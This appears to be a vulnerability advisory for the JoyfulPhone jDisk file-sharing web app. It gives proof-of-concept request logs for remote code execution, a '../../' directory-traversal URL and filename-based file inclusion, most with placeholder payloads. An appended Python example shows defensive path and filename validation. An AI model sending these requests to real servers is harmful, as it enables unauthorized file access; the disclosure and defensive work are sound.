1.1
The remote code execution vulnerability can be exploited by remote attackers without a privileged web-application user account or user interaction.
To demonstrate or reproduce the vulnerability, follow the information and steps provided below.

--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost:12345/__FD__?action=saveFile&path=[VULNERABLE CODE EXECUTION VALUE!] Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Größe des Inhalts[86] Mime Type[text/html]
   Request Header:
      Host[localhost:12345]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Content-Type[application/json; charset=UTF-8]
      X-Requested-With[XMLHttpRequest]
      Referer[http://localhost:12345/]
      Content-Length[14]
      Cookie[jtable%2376270709page-size=10]
      Connection[keep-alive]
      Pragma[no-cache]
      Cache-Control[no-cache]
   POST-Daten:
      {"content":"&path=[VULNERABLE CODE EXECUTION VALUE!]"}[]
   Response Header:
      Accept-Ranges[bytes]
      Content-Length[86]
      Content-Type[text/html]
      Date[Tue, 11 Feb 2014 23:11:06 GMT]

1.2
The directory-traversal vulnerability can be exploited by remote attackers without user interaction or a privileged web-application user account.
To demonstrate or reproduce the vulnerability, follow the information and steps provided below.
PoC:
http://localhost:12345/__FD__?action=folderContent&folder=%20%2F..%2F..%2F[DIRECTORY TRAVERSAL WEB VULNERABILITY!]&_dc=1392159953825

#{"msg":"","success":true,"data":[{"name":"%20%2F..%2F..%2F[DIRECTORY TRAVERSAL WEB VULNERABILITY!]","id":"/%20%2F..%2F..%2F[DIRECTORY TRAVERSAL WEB VULNERABILITY!]","type":"file", "size":24386,"changed":"2014-02-12 00:13:49","created":"2014-02-12 00:13:49"}]}

--- PoC Session Logs [GET] ---
Status: 200[OK]
GET http://localhost:12345/__FD__?action=folderContent&folder=%20%2F..%2F..%2F[DIRECTORY TRAVERSAL WEB VULNERABILITY!]&_dc=1392159953825 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[35] Mime Type[text/html]
   Request Header:
      Host[localhost:12345]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Cookie[jtable%2376270709page-size=10]
      Connection[keep-alive]
   Response Header:
      Accept-Ranges[bytes]
      Content-Length[35]
      Content-Type[text/html]
      Date[Tue, 11 Feb 2014 23:14:46 GMT]

1.3
The file include vulnerability can be exploited by remote attackers without user interaction or a privileged web-application user account.
To demonstrate or reproduce the vulnerability, follow the information and steps provided below.
PoC:
<div class="x-grid-row-checker"> </div></div></td><td class=" x-grid-cell x-grid-cell-gridcolumn-1015 "> <div class="x-grid-cell-inner " style="text-align: left; ;"><div style="position:relative;top:3px"> <img src="JoyfulPhone%C2%AE%20jDisk_file%20include_rename-Dateien/__FD__.txt" style="width:16px;height:16px;"><span style="position:absolute; padding-left: 5px; padding-top:0px">>"<[LOCAL FILE INCLUDE VULNERABILITY!].txt">[LOCAL FILE INCLUDE VULNERABILITY!].jpg</span></div></div></td><td class=" x-grid-cell x-grid-cell-gridcolumn-1016 " ><div class="x-grid-cell-inner " style="text-align: left; ;">/</div></td><td class=" x-grid-cell x-grid-cell-gridcolumn-1017 " ><div class="x-grid-cell-inner " style="text-align: right; ;">23.8 KB</div></td><td class=" x-grid-cell x-grid-cell-gridcolumn-1018 " ><div class="x-grid-cell-inner " style="text-align: left; ;">2014-02-12 00:13:49</div></td><td class=" x-grid-cell x-grid-cell-gridcolumn-1019 x-grid-cell-last" ><div class="x-grid-cell-inner " style="text-align: left; ;">2014-02-12 00:13:49</div></td></tr></tbody></table></iframe></span></div></div></td></tr></tbody></table></div>

PoC: rename - text file
<td style="width: 100%;" class="x-form-item-body " id="messagebox-1001-testfield-bodyEl" role="presentation" colspan="3"> <input value=">"<[LOCAL FILE INCLUDE VULNERABILITY!]>[LOCAL FILE INCLUDE VULNERABILITY!].jpg" data-errorqtip="" aria-invalid="false" id="messagebox-1001-testfield-inputEl" size="1" name="messagebox-1001-testfield-inputEl" style="width: 100%; -moz-user-select: text;" class="x-form-field x-form-text x-form-focus x-field-form-focus x-field-default-form-focus" autocomplete="off" type="text"></td></tr></tbody></table> <table id="messagebox-1001-textarea" class="x-field x-form-item x-field-default x-anchor-form-item" style="height: 75px; table-layout: fixed; width: 520px; display: none;" cellpadding="0"><tbody><tr id="messagebox-1001-textarea-inputRow"><td id="messagebox-1001-textarea-labelCell" 
style="display:none;" halign="left" class="x-field-label-cell" valign="top" width="105"><label id="messagebox-1001-textarea-labelEl" for="messagebox-1001-textarea-inputEl" class="x-form-item-label x-form-item-label-left" style="width:100px;margin-right:5px;"></label></td><td style="width: 100%;" class="x-form-item-body " id="messagebox-1001-textarea-bodyEl" role="presentation" colspan="3"><textarea data-errorqtip="" aria-invalid="false" id="messagebox-1001-textarea-inputEl" name="messagebox-1001-textarea-inputEl" rows="4" cols="20" class="x-form-field x-form-text" style="width: 100%; height: 75px; -moz-user-select: text;" autocomplete="off">
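
Added example (not part of the original advisory and not the vendor's code): one way a server could check the `folder`/`path` values shown in 1.1 and 1.2 and the filenames shown in 1.3 before using or displaying them. SHARE_ROOT, the filename policy and all function names are assumptions made for illustration.

```python
import html
import os
import re
from urllib.parse import unquote

SHARE_ROOT = "/srv/jdisk-share"  # assumed share root (hypothetical path)
NAME_OK = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_ .()-]{0,254}")  # assumed policy


def fully_decode(value, max_rounds=5):
    """Percent-decode until stable so nested encoding cannot hide '../'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many encoding layers")


def resolve_folder(raw, root=SHARE_ROOT):
    """Resolve a `folder`/`path` request value; raise if it leaves root."""
    value = fully_decode(raw)
    if "\x00" in value:
        raise ValueError("NUL byte in path")
    root_real = os.path.realpath(root)
    # Always join below the root; realpath collapses '..' and symlinks.
    candidate = os.path.realpath(os.path.join(root_real, value.lstrip("/")))
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise ValueError("path escapes the share root")
    return candidate


def validate_filename(raw):
    """Accept a rename/upload filename only if it is a plain single name."""
    name = fully_decode(raw)
    # Allowlist: no separators, quotes, angle brackets or leading dots.
    if not NAME_OK.fullmatch(name):
        raise ValueError("filename rejected")
    return name


def render_name(name):
    """Escape a stored filename before placing it in the listing HTML."""
    return html.escape(name, quote=True)
```

The containment check runs after decoding and canonicalisation, so the leading `%20%2F` in the 1.2 request value does not change the outcome.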